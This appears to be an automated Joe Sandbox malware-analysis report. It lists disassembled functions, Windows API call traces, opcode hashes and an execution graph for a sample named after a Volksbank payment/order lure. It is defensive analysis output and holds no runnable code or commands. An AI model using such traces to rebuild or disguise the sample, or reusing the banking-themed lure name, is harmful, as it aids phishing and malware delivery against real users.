                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 546120528-176419635
                                                                                                                                                                                                                                          • Opcode ID: 9d43ef179f7477d1110594984b12adaa5047ba188399b92dc8a963bf22446332
                                                                                                                                                                                                                                          • Instruction ID: 0f895286e6eec68bae33d83c5d7a513b5ede432eaa089d27c1d1a7a7e4c1c25c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d43ef179f7477d1110594984b12adaa5047ba188399b92dc8a963bf22446332
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E5103B5A043459EFB148F65C8806AABFE5EF41224F0C486ED0858B761EF3DD647CBA0
                                                                                                                                                                                                                                          Function 34F46ACB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 34F46AF0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Info
                                                                                                                                                                                                                                          • String ID: $h#9/
                                                                                                                                                                                                                                          • API String ID: 1807457897-2385237740
                                                                                                                                                                                                                                          • Opcode ID: 58499653772f32e636872f4fae67078d4c9497e3427435d5c94fc30da4937e0e
                                                                                                                                                                                                                                          • Instruction ID: 923feb0c476730e40489de0473b8f690d9f08bdb81ec1176167a6779cb276a63
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58499653772f32e636872f4fae67078d4c9497e3427435d5c94fc30da4937e0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6411C7550434C9FFB218F14CC84AE6BFADEB55708F1808EDD58986252DA399947CF20
                                                                                                                                                                                                                                          Function 34F49807 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,34F49C44,?,00000000,?,00000000,00000000), ref: 34F498B1
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,34F49C44,?,00000000,?,00000000,00000000,?,00000000), ref: 34F498DA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 442123175-176419635
                                                                                                                                                                                                                                          • Opcode ID: 912688a283d74bb403213a1b20f81e8a31614f7ec5ba81cff5fe5f92b7c55f56
                                                                                                                                                                                                                                          • Instruction ID: 5da11f9ea4704e82f28e26a5dd5e353b9aa562483a05409a82424033567272ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 912688a283d74bb403213a1b20f81e8a31614f7ec5ba81cff5fe5f92b7c55f56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02318171B002199FDB24CF6DCC80999B7F9FF98311B5889AAE509D7350EB30A986CF50
                                                                                                                                                                                                                                          Function 34F49728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,34F49C64,?,00000000,?,00000000,00000000), ref: 34F497C3
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,34F49C64,?,00000000,?,00000000,00000000,?,00000000), ref: 34F497EC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: h#9/
                                                                                                                                                                                                                                          • API String ID: 442123175-176419635
                                                                                                                                                                                                                                          • Opcode ID: 3f75f8985ec165b46186933f40cc063c037ca69580a1bbb0d090ecc2bd42c44d
                                                                                                                                                                                                                                          • Instruction ID: d7d47f9e6ecf88b256ba4147bbf78d2c023627b3f61bf0b9dc571fbc25502ac8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f75f8985ec165b46186933f40cc063c037ca69580a1bbb0d090ecc2bd42c44d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5621A075B002199FDB14CF69D880BD9BBF9EB48342F1408AAE946D7351DA30A982CF60
                                                                                                                                                                                                                                          Function 34F45F19 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 34F45F8A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String
                                                                                                                                                                                                                                          • String ID: LCMapStringEx$h#9/
                                                                                                                                                                                                                                          • API String ID: 2568140703-2161119708
                                                                                                                                                                                                                                          • Opcode ID: c11dff3f6ae2d2831cb7cdc6dd79e4b7661fbbdff454edb30d9e17544b2829e8
                                                                                                                                                                                                                                          • Instruction ID: fa5c3efb3078b2bb4b01b7001c2aaafb34ad7de95eb7d77f356c3c61058d7c79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c11dff3f6ae2d2831cb7cdc6dd79e4b7661fbbdff454edb30d9e17544b2829e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D332500249FBDF12AF94DC00EAE3F66EF48364F094554FE0826260CE329972AF95
                                                                                                                                                                                                                                          Function 00405D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405D9E
                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040334E,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,76943420,0040359C), ref: 00405DB9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7792667737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792636395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792707770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792742913.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7792818028.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                          • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                          • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64
                                                                                                                                                                                                                                          Function 34F45EB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 34F45F02
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                          • String ID: InitializeCriticalSectionEx$h#9/
                                                                                                                                                                                                                                          • API String ID: 2593887523-2236687765
                                                                                                                                                                                                                                          • Opcode ID: 9708ca741223582d83de14761d73cd76a80879e23f37a1a2492c97582b128efd
                                                                                                                                                                                                                                          • Instruction ID: db43e63797e899b6d463481ff4632325c3c8a1f105d3f9b164da4d1122f13f2d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9708ca741223582d83de14761d73cd76a80879e23f37a1a2492c97582b128efd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF0E93158010CFBEF116F54DC00DAE7F65DF54310B194454FE0466350DE3199139ED5
                                                                                                                                                                                                                                          Function 34F45DB2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                                          • String ID: FlsFree$h#9/
                                                                                                                                                                                                                                          • API String ID: 3978063606-742199354
                                                                                                                                                                                                                                          • Opcode ID: a047a3f87085dac9790bda52080554c298a8c331445207f242ab1ff4153e0cdc
                                                                                                                                                                                                                                          • Instruction ID: 855740ec537c0afd2072f84cd264971b14618410cd1dd147b1071a1279431247
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a047a3f87085dac9790bda52080554c298a8c331445207f242ab1ff4153e0cdc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DE0E572A00118EBD3116B74DC04D7EBF64CF99A04B0D0599FE0567340DD318D138EDA
                                                                                                                                                                                                                                          Function 34F45D5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.7810546521.0000000034F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 34F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810515071.0000000034F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.7810546521.0000000034F56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_34f40000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Alloc
                                                                                                                                                                                                                                          • String ID: FlsAlloc$h#9/
                                                                                                                                                                                                                                          • API String ID: 2773662609-3100467703
                                                                                                                                                                                                                                          • Opcode ID: 115e1ca5c2ca330ca7114f8ca65c793f6a983bc17ecfa8811d5a3d431b3488c7
                                                                                                                                                                                                                                          • Instruction ID: a63a0398ff89b63f2f06f7c68e9a7d756c221f2a3eaf563152a65466452ce11b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115e1ca5c2ca330ca7114f8ca65c793f6a983bc17ecfa8811d5a3d431b3488c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E0E535644218EBE3106B74EC04A6E7FA4DF98214B0908A8FE0567300CE215D038AD9

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:6.7%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                          Signature Coverage:3.2%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:79
                                                                                                                                                                                                                                          execution_graph 37632 44dea5 37633 44deb5 FreeLibrary 37632->37633 37634 44dec3 37632->37634 37633->37634 37635 4287c1 37636 4287d2 37635->37636 37639 429ac1 37635->37639 37640 428818 37636->37640 37641 42881f 37636->37641 37651 425711 37636->37651 37637 4259da 37698 416760 11 API calls 37637->37698 37650 425ad6 37639->37650 37705 415c56 11 API calls 37639->37705 37672 42013a 37640->37672 37700 420244 97 API calls 37641->37700 37643 4260dd 37699 424251 120 API calls 37643->37699 37646 4259c2 37646->37650 37692 415c56 11 API calls 37646->37692 37651->37637 37651->37639 37651->37646 37654 422aeb memset memcpy memcpy 37651->37654 37655 429a4d 37651->37655 37661 4260a1 37651->37661 37671 425a38 37651->37671 37688 4227f0 memset memcpy 37651->37688 37689 422b84 15 API calls 37651->37689 37690 422b5d memset memcpy memcpy 37651->37690 37691 422640 13 API calls 37651->37691 37693 4241fc 11 API calls 37651->37693 37694 42413a 90 API calls 37651->37694 37654->37651 37656 429a66 37655->37656 37657 429a9b 37655->37657 37701 415c56 11 API calls 37656->37701 37660 429a96 37657->37660 37703 416760 11 API calls 37657->37703 37704 424251 120 API calls 37660->37704 37697 415c56 11 API calls 37661->37697 37663 429a7a 37702 416760 11 API calls 37663->37702 37671->37646 37695 422640 13 API calls 37671->37695 37696 4226e0 12 API calls 37671->37696 37673 42014c 37672->37673 37676 420151 37672->37676 37715 41e466 97 API calls 37673->37715 37675 420162 37675->37651 37676->37675 37677 4201b3 37676->37677 37678 420229 37676->37678 37679 4201b8 37677->37679 37680 4201dc 37677->37680 37678->37675 37681 41fd5e 86 API calls 37678->37681 37706 41fbdb 37679->37706 37680->37675 37684 4201ff 37680->37684 37712 41fc4c 37680->37712 37681->37675 37684->37675 37687 42013a 97 API calls 37684->37687 37687->37675 37688->37651 37689->37651 37690->37651 37691->37651 37692->37637 37693->37651 37694->37651 37695->37671 37696->37671 37697->37637 37698->37643 37699->37650 37700->37651 37701->37663 37702->37660 37703->37660 37704->37639 37705->37637 37707 41fbf1 37706->37707 37708 41fbf8 37706->37708 37711 41fc39 37707->37711 37730 4446ce 11 API calls 37707->37730 37720 41ee26 37708->37720 37711->37675 37716 41fd5e 37711->37716 37713 41ee6b 86 API calls 37712->37713 37714 41fc5d 37713->37714 37714->37680 37715->37676 37719 41fd65 37716->37719 37717 41fdab 37717->37675 37718 41fbdb 86 API calls 37718->37719 37719->37717 37719->37718 37721 41ee41 37720->37721 37722 41ee32 37720->37722 37731 41edad 37721->37731 37734 4446ce 11 API calls 37722->37734 37726 41ee3c 37726->37707 37728 41ee58 37728->37726 37736 41ee6b 37728->37736 37730->37711 37740 41be52 37731->37740 37734->37726 37735 41eb85 11 API calls 37735->37728 37737 41ee70 37736->37737 37738 41ee78 37736->37738 37793 41bf99 86 API calls 37737->37793 37738->37726 37741 41be6f 37740->37741 37742 41be5f 37740->37742 37747 41be8c 37741->37747 37772 418c63 memset memset 37741->37772 37771 4446ce 11 API calls 37742->37771 37744 41be69 37744->37726 37744->37735 37747->37744 37748 41bf3a 37747->37748 37750 41bed1 37747->37750 37751 41bee7 37747->37751 37775 4446ce 11 API calls 37748->37775 37752 41bef0 37750->37752 37754 41bee2 37750->37754 37751->37744 37776 41a453 86 API calls 37751->37776 37752->37751 37753 41bf01 37752->37753 37755 41bf24 memset 37753->37755 37757 41bf14 37753->37757 37773 418a6d memset memcpy memset 37753->37773 37761 41ac13 37754->37761 37755->37744 37774 41a223 memset memcpy memset 37757->37774 37760 41bf20 37760->37755 37762 41ac3f memset 37761->37762 37763 41ac52 37761->37763 37768 41acd9 37762->37768 37765 41ac6a 37763->37765 37777 41dc14 19 API calls 37763->37777 37766 41aca1 37765->37766 37778 41519d 37765->37778 37766->37768 37769 41acc0 memset 37766->37769 37770 41accd memcpy 37766->37770 37768->37751 37769->37768 37770->37768 37771->37744 37772->37747 37773->37757 37774->37760 37775->37751 37777->37765 37781 4175ed 37778->37781 37789 417570 SetFilePointer 37781->37789 37784 41760a ReadFile 37785 417637 37784->37785 37786 417627 GetLastError 37784->37786 37787 4151b3 37785->37787 37788 41763e memset 37785->37788 37786->37787 37787->37766 37788->37787 37790 4175b2 37789->37790 37791 41759c GetLastError 37789->37791 37790->37784 37790->37787 37791->37790 37792 4175a8 GetLastError 37791->37792 37792->37790 37793->37738 37794 417bc5 37795 417c61 37794->37795 37796 417bda 37794->37796 37796->37795 37797 417bf6 UnmapViewOfFile CloseHandle 37796->37797 37799 417c2c 37796->37799 37801 4175b7 37796->37801 37797->37796 37797->37797 37799->37796 37806 41851e 20 API calls 37799->37806 37802 4175d6 CloseHandle 37801->37802 37803 4175c8 37802->37803 37804 4175df 37802->37804 37803->37804 37805 4175ce Sleep 37803->37805 37804->37796 37805->37802 37806->37799 37807 4152c7 malloc 37808 4152ef 37807->37808 37810 4152e2 37807->37810 37811 416760 11 API calls 37808->37811 37811->37810 37812 4232e8 37813 4232ef 37812->37813 37816 415b2c 37813->37816 37815 423305 37817 415b42 37816->37817 37820 415b46 37816->37820 37818 415b94 37817->37818 37817->37820 37821 415b5a 37817->37821 37823 4438b5 37818->37823 37820->37815 37821->37820 37822 415b79 memcpy 37821->37822 37822->37820 37824 4438d0 37823->37824 37834 4438c9 37823->37834 37837 415378 memcpy memcpy 37824->37837 37834->37820 37838 41276d 37839 41277d 37838->37839 37881 4044a4 LoadLibraryW 37839->37881 37841 412785 37842 412789 37841->37842 37889 414b81 37841->37889 37845 4127c8 37895 412465 memset ??2@YAPAXI 37845->37895 37847 4127ea 37907 40ac21 37847->37907 37852 412813 37925 40dd07 memset 37852->37925 37853 412827 37930 40db69 memset 37853->37930 37856 412822 37951 4125b6 ??3@YAXPAX 37856->37951 37858 40ada2 _wcsicmp 37860 41283d 37858->37860 37860->37856 37863 412863 CoInitialize 37860->37863 37935 41268e 37860->37935 37955 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37863->37955 37866 41296f 37957 40b633 37866->37957 37868 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37873 412957 CoUninitialize 37868->37873 37878 4128ca 37868->37878 37873->37856 37874 4128d0 TranslateAcceleratorW 37875 412941 GetMessageW 37874->37875 37874->37878 37875->37873 37875->37874 37876 412909 IsDialogMessageW 37876->37875 37876->37878 37877 4128fd IsDialogMessageW 37877->37875 37877->37876 37878->37874 37878->37876 37878->37877 37879 41292b TranslateMessage DispatchMessageW 37878->37879 37880 41291f IsDialogMessageW 37878->37880 37879->37875 37880->37875 37880->37879 37882 4044f7 37881->37882 37883 4044cf GetProcAddress 37881->37883 37887 404507 MessageBoxW 37882->37887 37888 40451e 37882->37888 37884 4044e8 FreeLibrary 37883->37884 37885 4044df 37883->37885 37884->37882 37886 4044f3 37884->37886 37885->37884 37886->37882 37887->37841 37888->37841 37890 414b8a 37889->37890 37891 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37889->37891 37961 40a804 memset 37890->37961 37891->37845 37894 414b9e GetProcAddress 37894->37891 37896 4124e0 37895->37896 37897 412505 ??2@YAPAXI 37896->37897 37898 412521 37897->37898 37899 41251c 37897->37899 37972 444722 37898->37972 37983 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37899->37983 37906 41259b wcscpy 37906->37847 37988 40b1ab free free 37907->37988 37909 40ad76 37989 40aa04 37909->37989 37912 40a9ce malloc memcpy free free 37915 40ac5c 37912->37915 37913 40ad4b 37913->37909 38012 40a9ce 37913->38012 37915->37909 37915->37912 37915->37913 37916 40ace7 free 37915->37916 37992 40a8d0 37915->37992 38004 4099f4 37915->38004 37916->37915 37920 40a8d0 7 API calls 37920->37909 37921 40ada2 37922 40adc9 37921->37922 37923 40adaa 37921->37923 37922->37852 37922->37853 37923->37922 37924 40adb3 _wcsicmp 37923->37924 37924->37922 37924->37923 38017 40dce0 37925->38017 37927 40dd3a GetModuleHandleW 38022 40dba7 37927->38022 37931 40dce0 3 API calls 37930->37931 37932 40db99 37931->37932 38094 40dae1 37932->38094 38108 402f3a 37935->38108 37937 412766 37937->37856 37937->37863 37938 4126d3 _wcsicmp 37939 4126a8 37938->37939 37939->37937 37939->37938 37941 41270a 37939->37941 38143 4125f8 7 API calls 37939->38143 37941->37937 38111 411ac5 37941->38111 37952 4125da 37951->37952 37953 4125f0 37952->37953 37954 4125e6 DeleteObject 37952->37954 37956 40b1ab free free 37953->37956 37954->37953 37955->37868 37956->37866 37958 40b640 37957->37958 37959 40b639 free 37957->37959 37960 40b1ab free free 37958->37960 37959->37958 37960->37842 37962 40a83b GetSystemDirectoryW 37961->37962 37963 40a84c wcscpy 37961->37963 37962->37963 37968 409719 wcslen 37963->37968 37966 40a881 LoadLibraryW 37967 40a886 37966->37967 37967->37891 37967->37894 37969 409724 37968->37969 37970 409739 wcscat LoadLibraryW 37968->37970 37969->37970 37971 40972c wcscat 37969->37971 37970->37966 37970->37967 37971->37970 37973 444732 37972->37973 37974 444728 DeleteObject 37972->37974 37984 409cc3 37973->37984 37974->37973 37976 412551 37977 4010f9 37976->37977 37978 401130 37977->37978 37979 401134 GetModuleHandleW LoadIconW 37978->37979 37980 401107 wcsncat 37978->37980 37981 40a7be 37979->37981 37980->37978 37982 40a7d2 37981->37982 37982->37906 37982->37982 37983->37898 37987 409bfd memset wcscpy 37984->37987 37986 409cdb CreateFontIndirectW 37986->37976 37987->37986 37988->37915 37990 40aa14 37989->37990 37991 40aa0a free 37989->37991 37990->37921 37991->37990 37993 40a8eb 37992->37993 37994 40a8df wcslen 37992->37994 37995 40a906 free 37993->37995 37996 40a90f 37993->37996 37994->37993 37997 40a919 37995->37997 37998 4099f4 3 API calls 37996->37998 37999 40a932 37997->37999 38000 40a929 free 37997->38000 37998->37997 38002 4099f4 3 API calls 37999->38002 38001 40a93e memcpy 38000->38001 38001->37915 38003 40a93d 38002->38003 38003->38001 38005 409a41 38004->38005 38006 4099fb malloc 38004->38006 38005->37915 38008 409a37 38006->38008 38009 409a1c 38006->38009 38008->37915 38010 409a30 free 38009->38010 38011 409a20 memcpy 38009->38011 38010->38008 38011->38010 38013 40a9e7 38012->38013 38014 40a9dc free 38012->38014 38015 4099f4 3 API calls 38013->38015 38016 40a9f2 38014->38016 38015->38016 38016->37920 38041 409bca GetModuleFileNameW 38017->38041 38019 40dce6 wcsrchr 38020 40dcf5 38019->38020 38021 40dcf9 wcscat 38019->38021 38020->38021 38021->37927 38042 44db70 38022->38042 38024 40dbb4 memset memset 38044 409bca GetModuleFileNameW 38024->38044 38026 40dbfd 38045 4447d9 38026->38045 38029 40dc34 wcscpy wcscpy 38071 40d6f5 38029->38071 38030 40dc1f wcscpy 38030->38029 38033 40d6f5 3 API calls 38034 40dc73 38033->38034 38035 40d6f5 3 API calls 38034->38035 38036 40dc89 38035->38036 38037 40d6f5 3 API calls 38036->38037 38038 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38037->38038 38077 40da80 38038->38077 38041->38019 38043 44db77 38042->38043 38043->38024 38043->38043 38044->38026 38047 4447f4 38045->38047 38046 40dc1b 38046->38029 38046->38030 38047->38046 38048 444807 ??2@YAPAXI 38047->38048 38049 44481f 38048->38049 38050 444873 _snwprintf 38049->38050 38051 4448ab wcscpy 38049->38051 38084 44474a 8 API calls 38050->38084 38053 4448bb 38051->38053 38085 44474a 8 API calls 38053->38085 38054 4448a7 38054->38051 38054->38053 38056 4448cd 38086 44474a 8 API calls 38056->38086 38058 4448e2 38087 44474a 8 API calls 38058->38087 38060 4448f7 38088 44474a 8 API calls 38060->38088 38062 44490c 38089 44474a 8 API calls 38062->38089 38064 444921 38090 44474a 8 API calls 38064->38090 38066 444936 38091 44474a 8 API calls 38066->38091 38068 44494b 38092 44474a 8 API calls 38068->38092 38070 444960 ??3@YAXPAX 38070->38046 38072 44db70 38071->38072 38073 40d702 memset GetPrivateProfileStringW 38072->38073 38074 40d752 38073->38074 38075 40d75c WritePrivateProfileStringW 38073->38075 38074->38075 38076 40d758 38074->38076 38075->38076 38076->38033 38078 44db70 38077->38078 38079 40da8d memset 38078->38079 38080 40daac LoadStringW 38079->38080 38083 40dac6 38080->38083 38082 40dade 38082->37856 38083->38080 38083->38082 38093 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38083->38093 38084->38054 38085->38056 38086->38058 38087->38060 38088->38062 38089->38064 38090->38066 38091->38068 38092->38070 38093->38083 38104 409b98 GetFileAttributesW 38094->38104 38096 40daea 38097 40daef wcscpy wcscpy GetPrivateProfileIntW 38096->38097 38103 40db63 38096->38103 38105 40d65d GetPrivateProfileStringW 38097->38105 38099 40db3e 38106 40d65d GetPrivateProfileStringW 38099->38106 38101 40db4f 38107 40d65d GetPrivateProfileStringW 38101->38107 38103->37858 38104->38096 38105->38099 38106->38101 38107->38103 38144 40eaff 